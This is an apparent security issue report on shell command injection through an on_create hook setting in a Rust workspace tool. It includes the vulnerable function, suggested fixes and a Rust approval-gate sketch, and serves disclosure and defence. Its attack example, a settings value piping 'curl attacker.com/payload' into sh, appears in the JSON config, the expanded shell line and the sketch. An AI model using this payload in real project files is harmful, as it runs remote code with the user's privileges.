
Shell command injection via on_create hook in settings #70

@JanTvrdik


Summary

apply_on_create() in crates/okena-workspace/src/hooks.rs:883-887 concatenates the on_create_cmd value from settings directly into a shell script without any escaping, enabling arbitrary command execution.

Vulnerable Code

pub fn apply_on_create(shell: &ShellType, on_create_cmd: &str, env_vars: &HashMap<String, String>) -> ShellType {
    let shell_cmd = shell.to_command_string();
    let prefix = build_export_prefix(env_vars);
    let script = format!("{}{}; exec {}", prefix, on_create_cmd, shell_cmd);
    ShellType::for_command(script)
}

Attack Vector

A malicious project includes a settings.json or project-scoped hook config with:

{
  "hooks": {
    "terminal": {
      "on_create": "curl attacker.com/payload | sh #"
    }
  }
}

When a user opens this project and creates a terminal, the resulting shell script becomes:

sh -c 'export OKENA_PROJECT_ID=...; curl attacker.com/payload | sh #; exec /bin/bash'

The injected command runs with the user's full privileges.

Severity

Critical — remote code execution when opening a project with malicious hooks.

Suggested Fix

Options (in order of preference):

  1. Require explicit user approval when loading project-scoped hooks that execute shell commands (prompt with the exact command to be run)
  2. Validate/sanitize hook commands — reject or escape shell metacharacters
  3. Use execve-style invocation instead of sh -c string interpolation where possible

The same issue affects apply_shell_wrapper() at hooks.rs:950-959 (see separate issue).
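
Added example, not code from the issue or from the Okena code base: a sketch of fix option 1, a gate that a caller could run before apply_on_create() so that a hook loaded from a project runs only after the user has approved that exact command string. HookSource, HookDecision, ApprovalStore and the project path are hypothetical names and values chosen for illustration.

```rust
use std::collections::HashSet;
use std::path::{Path, PathBuf};

/// Where a hook was loaded from (hypothetical type, not the project's).
#[derive(Clone, Copy, PartialEq, Eq, Debug)]
pub enum HookSource {
    UserSettings,    // the user's own settings: trusted
    ProjectSettings, // shipped inside the opened project: untrusted
}

#[derive(PartialEq, Eq, Debug)]
pub enum HookDecision {
    Run(String),
    NeedsApproval { prompt: String },
}

/// Exact command strings the user has approved, keyed by project path.
#[derive(Default)]
pub struct ApprovalStore {
    approved: HashSet<(PathBuf, String)>,
}

impl ApprovalStore {
    pub fn approve(&mut self, project: &Path, cmd: &str) {
        self.approved.insert((project.to_path_buf(), cmd.to_owned()));
    }

    /// Gate to call before on_create_cmd is placed into the shell script.
    pub fn check(&self, project: &Path, source: HookSource, cmd: &str) -> HookDecision {
        let key = (project.to_path_buf(), cmd.to_owned());
        if source == HookSource::UserSettings || self.approved.contains(&key) {
            return HookDecision::Run(cmd.to_owned());
        }
        // escape_debug makes newlines and control characters visible, so
        // the prompt shows the whole command that would run.
        let prompt = format!("Project {} wants to run on terminal creation: \"{}\"",
            project.display(), cmd.escape_debug());
        HookDecision::NeedsApproval { prompt }
    }
}

fn main() {
    let store = ApprovalStore::default();
    let project = Path::new("/tmp/constructed-project"); // constructed path
    let cmd = "curl attacker.com/payload | sh #"; // hook value from the issue
    println!("{:?}", store.check(project, HookSource::ProjectSettings, cmd));
}
```

Because approval is keyed on the full command text, a project that later changes its on_create value falls back to NeedsApproval instead of inheriting the earlier consent.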
